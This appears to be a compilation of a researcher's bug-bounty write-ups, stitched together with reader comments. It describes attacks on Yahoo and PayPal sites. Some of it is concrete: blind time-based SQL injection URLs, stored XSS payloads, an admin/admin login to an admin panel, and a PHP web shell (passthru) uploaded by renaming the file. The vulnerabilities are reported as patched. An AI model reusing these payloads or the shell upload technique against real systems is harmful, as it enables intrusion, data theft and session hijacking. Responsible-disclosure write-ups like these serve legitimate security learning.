b3hr0uz

First of all let’s figure out the database version: contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+substring((select+version()),1,1)=4+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69 Which is false (version 4) and will sleep for 20 seconds. Let’s try Version 5: contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN substring((select version()),1,1)=5 THEN(sleep(1)) ELSE (sleep(20))END As BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69 Which after a quick second we got returned to our data-table page. Now as far as the database name goes, I will demonstrate only a few things due to the fact that the user length was 24 letters and database name was 6 letters: username: ****ww contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+(select+LENGTH(DATABASE()))=6+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69 and for the username: ***********@**.***.*.*** (taken out for security purposes) but as can see the 15th letter is show to be a “.” in the url below: http://contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN ASCII(substring((select user()),15,1))=46 THEN(sleep(1)) ELSE (sleep(60))END As BS)v)&sort_dir=asc&start_date=&override_id=131114 After 36 days I finally heard back from Yahoo that it has been patched! Thank you for reading! In a few weeks I will be soon covering a XSPA and XSS in a few services. Behrouz Sadeghipour @NahamSec NahamSec.com | Behrouz Sadeghipour's Personal Website

Hello. Normally I don’t write a write-up for XSS vulnerability; however this XSS was a bit different because it affects 100s of Yahoo! subdomains. After my SQL Injection on the HK sub-domains, I decided to actually start focusing on the more major sub-domains of Yahoo, and as a result I was able to XSS quite a few of Yahoo’s services. Here are a few to name: Travel Food Autos Security Developer News Weather Shine Shopping Celebrity TV Voices Homes Music Finance Cricket The list doesn’t stop there. This vulnerability affects all of Yahoo’s services where a user is able to make a comment including the list above in other languages as well. Now the question is: Was this a self XSS or did it get stored somewhere and get presented to other users? The answer to that question is… BOTH! The Research: Now how is this possible and what was the process for all of this? So in the beginning of the research I decided to poke around the “Tech” services of Yahoo, found a comment section and decided to comment on thispost: and give it the following string: “><img src=x onerror=prompt(1);> Which left with me the execution of an IMG ( “> ) tag but no prompt. So I decided to try a few more other strings and that led me onto using HTML entities and changing it to the following format: "><img src=x onerror=confirm(1);> Now what? Voila! We get the famous confirm(1) to popup: But how does this explain the XSS on all of Yahoo services listed and more?! Well the tech blog wasn’t the only place that had a comment section. Many of Yahoo’s services have a comment section. Some use the same exact comment platform as the one on “Tech” and “Travel” and some have a different comment platform, like the one on Sports, weather, and finance, BUT they both store the comments in a tab under “My Comments” -> “All Comments” and you will see the stored self XSS there. The “Self XSS” could also be engineered to be seen in the “Most recent” or “Most discussed” topics to execute an run the specific XSS string. Why is this a critical vulnerability? (Attack Vector) The websites which use the same platform as the attached video (same as the one on the tech, food, and the travel services) will store the string and present it to anyone visiting the post containing the comment. So with a sample bot and as easy copy/paste, we could post a comment containing a malicious code to hijack the visitors/emails’ session/cookie. We could also simply target a specific user by linking them to a post containing a comment with a malicious code by the attacker. Who’s affected by this Vulnerability? Thousands (if not millions) of users use Yahoo and Yahoo Mail in 65 countries supported by Yahoo. Each Yahoo International/country domain (Such as Hong Kong, Taiwan, Netherlands, India) uses one of the 2 comment platforms in their daily blog such as (news, food, tech,sports, and etc) which get thousands of Yahoo and Non-Yahoo member visitors daily and could have been a target to this vulnerability. Demo: Here’s a short video describing the attack just to show a few other sub-domains that were effected by this vulnerability: https://www.youtube.com/watch?v=3E80IDj0X_E Behrouz Sadeghipour 5/25/2014 Timeline: 04/29/2014 – Initial Report 04/29/2014 – Triaged 04/30/2014 – Comments section disabled on Y! Services 05/02/2014 – Patched but no update 05/16/2014 – Resolved and granted permission to publish

Hello, This write-up will cover how I bypassed one of Yahoo’s log-in pages with a sample trick. Even though I had decided to not write anything about this report (since it was out of scope), but a few people wanted to see the trick and I thought It would be a great thing to share with everyone else. (So please don’t bother to mention it’s out of scope and carry on with the post) Let’s have a look at what caught my attention in the first place that led on to the attack: Which took me to the following URL: However, by clicking on any of the following links I would be redirected to a login page that kind of looks like this: First step I took was to run curl and see if I am able to see the content of the files on my own server so: curl http://tw.urcosme.fashion.yahoo.net/justbeauty/Vol/22/edit > u2.html Now that I know I am able to see the content I decided to switch to firefox and fire-up the good ol’ NoRedirect: WE ARE IN. Here are a couple things I was able to do: Add new content: Edit: and I was also able to upload a file which you will be able to see here: I was able to get the full path and MySQL credentials by messing around with POST. There was also a possible SQLi via POST in the following admin panel which I wasn’t able to exploit due to the fact that I found the bug after the initial report. Timeline: 2014/04/18 – Reported 2014/04/18 – Triaged 2014/04/18 – Requested more information 2014/04/21 – Closed

Wow! Awesome!

Source: PayPal Marketing Remote Code Execution, Information Disclosure and XSS | NahamSec - Behrouz Sadeghipour's Personal Website Hello everyone, Today I will be writing about my experience with PayPal’s Bug Bounty Program and how I was able to discover a Remote Code Execution on one of their branded websites. While audition PayPal-Marketing.comfor a few XSS vulnerabilities I came across a strange URL: https://www.paypal-marketing.com/paypal/html/hosted/emarketing/partner/directory/v2/dirmob_db.php?action=getPartnerBasic&list=34158729+24555431948+28165489 Which displayed the content of the 3 IDs provided in the link given. So I figured I may be able to execute SQL commands and hope for RCE. However that wasn’t the case. After a few tries I realized that my SQL Injection is irritating the getPartnerBasic function by producing errors disclosing the full path of the website and mentioning the getPartnerBasic() function. So I decided to replace getPartnerBasic with phpinfo and see if that would do something (I doubt it!). However the following process resulted in: and I immediately reported the vulnerability to PayPal and received the following email: Hey, Were you actually able to run any other commands or just get the version and PHPinfo? Thanks, PayPal Security Team To make sure this isn’t lowered from and RCE to a information disclosure I replied to the PayPal Security Team with the following links which provided them with more information other than phpinfo PID https://www.paypal-marketing.com/paypal/html/hosted/emarketing/partner/directory/v2/dirmob_db.php?action=getmypid&list=(34158729) GID https://www.paypal-marketing.com/paypal/html/hosted/emarketing/partner/directory/v2/dirmob_db.php?action=getmygid&list=(34158729) UID https://www.paypal-marketing.com/paypal/html/hosted/emarketing/partner/directory/v2/dirmob_db.php?action=getmyuid&list=34158729 Paypal was extremely fast and patched the following vulnerability under 24 hours. Here’s the PoC Video: Cross-Site Scripting: I was also able to report an XSS in the search module of the PayPal-Marketing partner’s page by searching for a IMG tag injected with XSS. Vulnerable URL: https://www.paypal-marketing.com/paypal/html/hosted/emarketing/partner/directory/v2/

Not in scope, correct. however, I could've still managed to do a lot of damage, steal emails, or extract information. The server was using an old 2.6.32 kernel lol, and I was already at UID/GID 2 without using any exploits! I did complain about the bounty amount, but not much I could do about it! @akkiliON: Thanks, man!

Before saying this isn't in the scope, please read the whole article Hello Everyone, Recently I was analyzing an XSS vulnerability on one of Yahoo's Subdomains where I decided to also analyze the HTTP Headers. While doing so I came across the admin login page on (hk.yahoo.net), due to the fact that the search was being posted to search module from the admin panel. Well that's not the best part! Once I got to the admin page I thought to myself there's no way I will get passed this page and someone has probably tried to get pass this before... but wait!I wanna try user/password as admin/admin... cuz I'm funny and I want to try it before I look into other ways to obtain a user (like SQLi). Unfortunately I was able to login to the admin panel with an admin/admin criteria. No SQLi or anything needed! After snooping around for a few minutes, I came across and edit/insert page where I was able to create a new page and insert the needed pictures and information. Since I was able to login with the admin/admin as a login I figured the upload section will possibly allow me to bypass the upload restriction. As a part of my test I decided to create a file with the following name: Shell.php.jpg and I inserted a simple: <?passthru($_GET[v])?> and uploaded the file as I monitored the HTTP headers, revised those headers, replayed them, and successfully changed the file name back to shell.php Now here's where it gets interesting: (And yes, I did use a c99 shell to make everything easier!) As you can see our UID/GID is 2 (daemon). I had read/write/execute permissions in /home which contains few more subdomains and website. Also, Linux kernel is VERY old and is a rootable. Not to mention I was able to read most DIRs and Files but NOT including /etc/shadow). Here's the PoC video sent to Yahoo as a part of this research: Lessons Learned: Don't set your username and password the same. Don't set your username and password as admin. And have a better and restricter uploader. Is it in the scope? We don't know yet. Should it be? Yes! Why? Because most of the hk.ent.yahoo.com files are loaded and included from the .net domain and/or redirects to it. Also there was more than just one domain I could access via this vulnerability: Timeline: 2014-02-20 Reported 2014-02-20 Status was changed to Triaged 2014-02-21 Patched Bounty? Nothing yet!

what string did you use? <script>alert(/1337/)</script>?

Does cisco offer bounties for XSS?

Nice!

Thank you, sensi. I have reported a few myself. I am just trying to get in touch with other researchers and came across your post! Great work, man! I was lucky enough to find an on Yahoo! Send me your contact info, let's trade some information!

Hi, Can you publish the string you used for the xss? <i onmouseover=alert(1)>